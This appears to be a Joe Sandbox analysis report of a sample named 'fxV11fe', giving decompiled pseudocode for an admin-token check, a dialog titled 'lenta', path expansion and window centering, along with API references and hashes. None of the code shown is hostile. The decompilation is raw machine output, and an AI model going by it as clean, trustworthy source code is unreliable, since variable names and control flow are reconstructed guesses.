                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$lenta
                                                                                                                                                                                                                                            • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                            • Opcode ID: b407947b781ac5804f494e663f521869278c95df0a06d443959dd60a21e7f71c
                                                                                                                                                                                                                                            • Instruction ID: 23ea44642f0d6e35706a53d05b841ce6fb76912a35cd3b57fa5402b57b046334
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b407947b781ac5804f494e663f521869278c95df0a06d443959dd60a21e7f71c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF01D6B224030C7BE3105BE5BC4CF6B3E2CEBDAB51F040414FB4986190D9A2885383A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E00A017EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0xa0a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a017f6
                                                                                                                                                                                                                                            0x00a017fd
                                                                                                                                                                                                                                            0x00a01805
                                                                                                                                                                                                                                            0x00a0180b
                                                                                                                                                                                                                                            0x00a0180d
                                                                                                                                                                                                                                            0x00a01815
                                                                                                                                                                                                                                            0x00a01818
                                                                                                                                                                                                                                            0x00a01820
                                                                                                                                                                                                                                            0x00a01824
                                                                                                                                                                                                                                            0x00a0182c
                                                                                                                                                                                                                                            0x00a01832
                                                                                                                                                                                                                                            0x00a01837
                                                                                                                                                                                                                                            0x00a01851
                                                                                                                                                                                                                                            0x00a01854
                                                                                                                                                                                                                                            0x00a0185d
                                                                                                                                                                                                                                            0x00a01862
                                                                                                                                                                                                                                            0x00a0186c
                                                                                                                                                                                                                                            0x00a01872
                                                                                                                                                                                                                                            0x00a01877
                                                                                                                                                                                                                                            0x00a0187e
                                                                                                                                                                                                                                            0x00a0187e
                                                                                                                                                                                                                                            0x00a01883
                                                                                                                                                                                                                                            0x00a01883
                                                                                                                                                                                                                                            0x00a0185d
                                                                                                                                                                                                                                            0x00a0188a
                                                                                                                                                                                                                                            0x00a0188a
                                                                                                                                                                                                                                            0x00a018a2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A018DD), ref: 00A0181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A0182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00A018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A018DD), ref: 00A01855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,00A018DD), ref: 00A01883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A018DD), ref: 00A0188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: d8333fba05d0b01ce1bd51141741562606f87eea4fdac80a48c18214b73cfab1
                                                                                                                                                                                                                                            • Instruction ID: 6884d5e0bbe7fd6fc502fb02298b337865fc09585465aa0bd82c99d542612511
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8333fba05d0b01ce1bd51141741562606f87eea4fdac80a48c18214b73cfab1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82116371E0030DABDB14DFE4EC49ABEBB78EF48705F104569FA06E2290DA709D068B95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A03450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E00A043D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0xa09404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa091dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a03459
                                                                                                                                                                                                                                            0x00a0345c
                                                                                                                                                                                                                                            0x00a034d8
                                                                                                                                                                                                                                            0x00a034de
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a034e0
                                                                                                                                                                                                                                            0x00a0345e
                                                                                                                                                                                                                                            0x00a03463
                                                                                                                                                                                                                                            0x00a0349a
                                                                                                                                                                                                                                            0x00a034a0
                                                                                                                                                                                                                                            0x00a034a7
                                                                                                                                                                                                                                            0x00a034b2
                                                                                                                                                                                                                                            0x00a034c4
                                                                                                                                                                                                                                            0x00a034cb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a034cb
                                                                                                                                                                                                                                            0x00a03468
                                                                                                                                                                                                                                            0x00a0346e
                                                                                                                                                                                                                                            0x00a03474
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0347c
                                                                                                                                                                                                                                            0x00a0348c
                                                                                                                                                                                                                                            0x00a03490
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03496
                                                                                                                                                                                                                                            0x00a03484
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03486
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03486
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A03490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A0349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A034B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 00A034C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A034CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 00A034D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                            • Opcode ID: fcaac8b028d31d620eaa4214b0c2324f915853ceaa5ce38700a8930e85901a58
                                                                                                                                                                                                                                            • Instruction ID: 23e183995d20e2101aae1fe876d8dd70cfb35e7a2bff9786194fd645cc4b7066
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcaac8b028d31d620eaa4214b0c2324f915853ceaa5ce38700a8930e85901a58
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2001B53224021CABDB169FA5FC0C96E3A68EB19702F004110F9468E5E0C7728F43C785
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A02AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0xa09a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A01680(_t65, E00A017C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E00A065E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E00A01680(_t65, E00A017C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00a02aac
                                                                                                                                                                                                                                            0x00a02ab7
                                                                                                                                                                                                                                            0x00a02abc
                                                                                                                                                                                                                                            0x00a02abe
                                                                                                                                                                                                                                            0x00a02ac3
                                                                                                                                                                                                                                            0x00a02ac6
                                                                                                                                                                                                                                            0x00a02ac9
                                                                                                                                                                                                                                            0x00a02ace
                                                                                                                                                                                                                                            0x00a02ae6
                                                                                                                                                                                                                                            0x00a02bdc
                                                                                                                                                                                                                                            0x00a02bdc
                                                                                                                                                                                                                                            0x00a02be0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02af2
                                                                                                                                                                                                                                            0x00a02afc
                                                                                                                                                                                                                                            0x00a02b00
                                                                                                                                                                                                                                            0x00a02b05
                                                                                                                                                                                                                                            0x00a02b05
                                                                                                                                                                                                                                            0x00a02b0b
                                                                                                                                                                                                                                            0x00a02bca
                                                                                                                                                                                                                                            0x00a02bd1
                                                                                                                                                                                                                                            0x00a02b11
                                                                                                                                                                                                                                            0x00a02b18
                                                                                                                                                                                                                                            0x00a02b26
                                                                                                                                                                                                                                            0x00a02b99
                                                                                                                                                                                                                                            0x00a02bc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02b9b
                                                                                                                                                                                                                                            0x00a02bae
                                                                                                                                                                                                                                            0x00a02bb3
                                                                                                                                                                                                                                            0x00a02bb5
                                                                                                                                                                                                                                            0x00a02bb5
                                                                                                                                                                                                                                            0x00a02bb8
                                                                                                                                                                                                                                            0x00a02bb8
                                                                                                                                                                                                                                            0x00a02bba
                                                                                                                                                                                                                                            0x00a02bbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02bb8
                                                                                                                                                                                                                                            0x00a02b28
                                                                                                                                                                                                                                            0x00a02b2e
                                                                                                                                                                                                                                            0x00a02b33
                                                                                                                                                                                                                                            0x00a02b39
                                                                                                                                                                                                                                            0x00a02b3c
                                                                                                                                                                                                                                            0x00a02b3c
                                                                                                                                                                                                                                            0x00a02b3e
                                                                                                                                                                                                                                            0x00a02b3f
                                                                                                                                                                                                                                            0x00a02b55
                                                                                                                                                                                                                                            0x00a02b5d
                                                                                                                                                                                                                                            0x00a02b64
                                                                                                                                                                                                                                            0x00a02b64
                                                                                                                                                                                                                                            0x00a02b7a
                                                                                                                                                                                                                                            0x00a02b7f
                                                                                                                                                                                                                                            0x00a02b81
                                                                                                                                                                                                                                            0x00a02b81
                                                                                                                                                                                                                                            0x00a02b84
                                                                                                                                                                                                                                            0x00a02b84
                                                                                                                                                                                                                                            0x00a02b86
                                                                                                                                                                                                                                            0x00a02b87
                                                                                                                                                                                                                                            0x00a02bbf
                                                                                                                                                                                                                                            0x00a02bc1
                                                                                                                                                                                                                                            0x00a02bc1
                                                                                                                                                                                                                                            0x00a02b26
                                                                                                                                                                                                                                            0x00a02bda
                                                                                                                                                                                                                                            0x00a02bda
                                                                                                                                                                                                                                            0x00a02be6
                                                                                                                                                                                                                                            0x00a02be6
                                                                                                                                                                                                                                            0x00a02bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A02AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A02AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A02B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00A02B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00A02B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A02BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 233c43f49ca45b9e333a8c837599d515cc9d099dd2e95baeb9162b80c8c6e1d1
                                                                                                                                                                                                                                            • Instruction ID: 84211d57a0989321301ed5017e7f3666f89f51c4e270b5a1c4c9b86dbd35ee7b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 233c43f49ca45b9e333a8c837599d515cc9d099dd2e95baeb9162b80c8c6e1d1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441213420434D9EDB159F30AC18BFD7BA99F57300F14419AE8C287282DB358E87CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A043D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x00a043d0
                                                                                                                                                                                                                                            0x00a043d8
                                                                                                                                                                                                                                            0x00a043df
                                                                                                                                                                                                                                            0x00a043e6
                                                                                                                                                                                                                                            0x00a043ec
                                                                                                                                                                                                                                            0x00a043f1
                                                                                                                                                                                                                                            0x00a04400
                                                                                                                                                                                                                                            0x00a04403
                                                                                                                                                                                                                                            0x00a0440b
                                                                                                                                                                                                                                            0x00a04420
                                                                                                                                                                                                                                            0x00a04429
                                                                                                                                                                                                                                            0x00a04437
                                                                                                                                                                                                                                            0x00a04444
                                                                                                                                                                                                                                            0x00a04447
                                                                                                                                                                                                                                            0x00a0444d
                                                                                                                                                                                                                                            0x00a04454
                                                                                                                                                                                                                                            0x00a0445b
                                                                                                                                                                                                                                            0x00a04460
                                                                                                                                                                                                                                            0x00a04461
                                                                                                                                                                                                                                            0x00a04467
                                                                                                                                                                                                                                            0x00a0446f
                                                                                                                                                                                                                                            0x00a04473
                                                                                                                                                                                                                                            0x00a04473
                                                                                                                                                                                                                                            0x00a04463
                                                                                                                                                                                                                                            0x00a04463
                                                                                                                                                                                                                                            0x00a04463
                                                                                                                                                                                                                                            0x00a0447a
                                                                                                                                                                                                                                            0x00a04481
                                                                                                                                                                                                                                            0x00a04484
                                                                                                                                                                                                                                            0x00a0448a
                                                                                                                                                                                                                                            0x00a04492
                                                                                                                                                                                                                                            0x00a04496
                                                                                                                                                                                                                                            0x00a04496
                                                                                                                                                                                                                                            0x00a04486
                                                                                                                                                                                                                                            0x00a04486
                                                                                                                                                                                                                                            0x00a04486
                                                                                                                                                                                                                                            0x00a044b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00A043F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A0440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00A04423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A0442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A0443A
